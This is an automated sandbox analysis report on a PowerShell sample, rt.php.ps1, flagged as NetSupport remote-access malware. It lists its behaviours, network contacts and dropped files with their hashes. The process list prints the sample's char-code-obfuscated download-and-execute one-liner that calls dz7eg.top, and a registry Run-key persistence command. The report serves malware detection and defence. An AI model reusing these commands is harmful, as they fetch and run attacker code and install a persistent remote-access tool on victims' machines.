Analysis Overview
SHA256
8347464802fc276d09848d28162f8802566f8795a07521c535c693fdfdaa4c3d
Threat Level: Known bad
The file rt.php.ps1 was found to be: Known bad.
Malicious Activity Summary
NetSupport
Blocklisted process makes network request
Executes dropped EXE
Loads dropped DLL
Adds Run key to start application
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-05-30 17:15
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-05-30 17:15
Reported
2023-05-30 17:17
Platform
win7-20230220-en
Max time kernel
29s
Max time network
31s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1
Network
Files
memory/1208-58-0x000000001B1E0000-0x000000001B4C2000-memory.dmp
memory/1208-59-0x0000000002020000-0x0000000002028000-memory.dmp
memory/1208-60-0x0000000002030000-0x00000000020B0000-memory.dmp
memory/1208-61-0x0000000002030000-0x00000000020B0000-memory.dmp
memory/1208-62-0x0000000002030000-0x00000000020B0000-memory.dmp
memory/1208-63-0x0000000002030000-0x00000000020B0000-memory.dmp
memory/1208-64-0x0000000002030000-0x00000000020B0000-memory.dmp
memory/1208-65-0x0000000002030000-0x00000000020B0000-memory.dmp
memory/1208-66-0x0000000002030000-0x00000000020B0000-memory.dmp
memory/1208-67-0x0000000002030000-0x00000000020B0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-05-30 17:15
Reported
2023-05-30 17:17
Platform
win10v2004-20230220-en
Max time kernel
37s
Max time network
136s
Command Line
Signatures
NetSupport
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExpirienceHost = "C:\\Users\\Admin\\AppData\\Roaming\\QNSeJO3wL5Kv\\whost.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3760 wrote to memory of 4176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3760 wrote to memory of 4176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4176 wrote to memory of 3092 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\HOSTNAME.EXE |
| PID 4176 wrote to memory of 3092 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\HOSTNAME.EXE |
| PID 3760 wrote to memory of 388 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3760 wrote to memory of 388 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias rzs $([char]105+[char]110+[char]118+[char]111+[char]107+[char]101+[char]45+[char]101+[char]120+[char]112+[char]114+[char]101+[char]115+[char]115+[char]105+[char]111+[char]110);$global:block=(New-Object $([char]83+[char]121+[char]115+[char]116+[char]101+[char]109+[char]46+[char]78+[char]101+[char]116+[char]46+[char]87+[char]101+[char]98+[char]67+[char]108+[char]105+[char]101+[char]110+[char]116) ).($([char]68+[char]111+[char]119+[char]110+[char]108+[char]111+[char]97+[char]100+[char]83+[char]116+[char]114+[char]105+[char]110+[char]103) )($([char]104+[char]116+[char]116+[char]112+[char]58+[char]47+[char]47+[char]100+[char]122+[char]55+[char]101+[char]103+[char]46+[char]116+[char]111+[char]112+[char]47+[char]53+[char]49+[char]53+[char]47+[char]115+[char]100+[char]102+[char]122+[char]119+[char]46+[char]112+[char]104+[char]112+[char]63+[char]105+[char]61) +$(hostname));rzs $global:block
C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name ExpirienceHost -Value ""C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe""
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dz7eg.top | udp |
| US | 143.244.162.145:80 | dz7eg.top | tcp |
| US | 8.8.8.8:53 | 145.162.244.143.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fduic.top | udp |
| DE | 167.235.159.22:443 | fduic.top | tcp |
| US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp |
| GB | 62.172.138.67:80 | geo.netsupportsoftware.com | tcp |
| US | 8.8.8.8:53 | 22.159.235.167.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.138.172.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.18.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| IE | 20.50.73.11:443 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nksic0el.kdc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3760-133-0x000001D3E5020000-0x000001D3E5042000-memory.dmp
memory/3760-143-0x000001D3E50A0000-0x000001D3E50B0000-memory.dmp
memory/3760-144-0x000001D3E50A0000-0x000001D3E50B0000-memory.dmp
memory/4176-154-0x00000284C6E60000-0x00000284C6E70000-memory.dmp
memory/4176-155-0x00000284C6E60000-0x00000284C6E70000-memory.dmp
memory/4176-156-0x00000284C6E60000-0x00000284C6E70000-memory.dmp
memory/3760-160-0x000001D3E77D0000-0x000001D3E77DA000-memory.dmp
memory/3760-161-0x000001D3E7800000-0x000001D3E7812000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
memory/388-190-0x000001EEFDD80000-0x000001EEFDD90000-memory.dmp
memory/388-191-0x000001EEFDD80000-0x000001EEFDD90000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f5f268a3d8760169bde3db6e00da5e6c |
| SHA1 | 00dc2443a967bf09147612f53ea5fc6a2cfb0b40 |
| SHA256 | b0f800d487f826601ef6a21ddd141c41d57182c1601e2adf1c0132b98c8d73b5 |
| SHA512 | c067de9cfefea861a08a29a1b10bcf93d360ec555bdd9fd24fb8f6ce6be432961a1acc4ccef786e953d86ef836db27fdef5fd5951930edd00e1c4fcfa3a9d67e |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe
| MD5 | c0eb3eac96511077dafc0afa64c6388c |
| SHA1 | 33e81f25493eda3bbf0b7cdcddd523547fa6c31e |
| SHA256 | eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a |
| SHA512 | 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe
| MD5 | c0eb3eac96511077dafc0afa64c6388c |
| SHA1 | 33e81f25493eda3bbf0b7cdcddd523547fa6c31e |
| SHA256 | eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a |
| SHA512 | 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\PCICL32.dll
| MD5 | 00587238d16012152c2e951a087f2cc9 |
| SHA1 | c4e27a43075ce993ff6bb033360af386b2fc58ff |
| SHA256 | 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 |
| SHA512 | 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226 |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\PCICL32.DLL
| MD5 | 00587238d16012152c2e951a087f2cc9 |
| SHA1 | c4e27a43075ce993ff6bb033360af386b2fc58ff |
| SHA256 | 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 |
| SHA512 | 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226 |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\pcichek.dll
| MD5 | a0b9388c5f18e27266a31f8c5765b263 |
| SHA1 | 906f7e94f841d464d4da144f7c858fa2160e36db |
| SHA256 | 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a |
| SHA512 | 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\PCICHEK.DLL
| MD5 | a0b9388c5f18e27266a31f8c5765b263 |
| SHA1 | 906f7e94f841d464d4da144f7c858fa2160e36db |
| SHA256 | 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a |
| SHA512 | 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\pcicapi.dll
| MD5 | dcde2248d19c778a41aa165866dd52d0 |
| SHA1 | 7ec84be84fe23f0b0093b647538737e1f19ebb03 |
| SHA256 | 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 |
| SHA512 | c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166 |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\pcicapi.dll
| MD5 | dcde2248d19c778a41aa165866dd52d0 |
| SHA1 | 7ec84be84fe23f0b0093b647538737e1f19ebb03 |
| SHA256 | 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 |
| SHA512 | c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166 |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\MSVCR100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\msvcr100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\msvcr100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\client32.ini
| MD5 | 5d2b788f10e973fce372fa2e4ececd4e |
| SHA1 | 40cc5404b896dd6ed657bba39ffdb6d63f45e9a1 |
| SHA256 | 483b4c008ab680dd0958f5f09c55d6dc35f90fca1c3835fb864a1e8fcb598475 |
| SHA512 | 168c7d962ab5b813e426eca03fd718c05a34d393b2fd79b3685fdcb408ae29399c4b6de8decfa893f039eb871425579cffdbf55465830a7801c065491c95ba20 |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\NSM.LIC
| MD5 | 390c964070626a64888d385c514f568e |
| SHA1 | a556209655dcb5e939fd404f57d199f2bb6da9b3 |
| SHA256 | ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54 |
| SHA512 | f089c59a24f33410cf98fba7ea0dd2ca0fd997efc9a03e5355cde3c1a1f4a78b13cebd387099b9de824bffea01c489d8f0e90df56f89973007dabb6afdde607f |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\HTCTL32.DLL
| MD5 | 2d3b207c8a48148296156e5725426c7f |
| SHA1 | ad464eb7cf5c19c8a443ab5b590440b32dbc618f |
| SHA256 | edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 |
| SHA512 | 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\HTCTL32.DLL
| MD5 | 2d3b207c8a48148296156e5725426c7f |
| SHA1 | ad464eb7cf5c19c8a443ab5b590440b32dbc618f |
| SHA256 | edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 |
| SHA512 | 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c |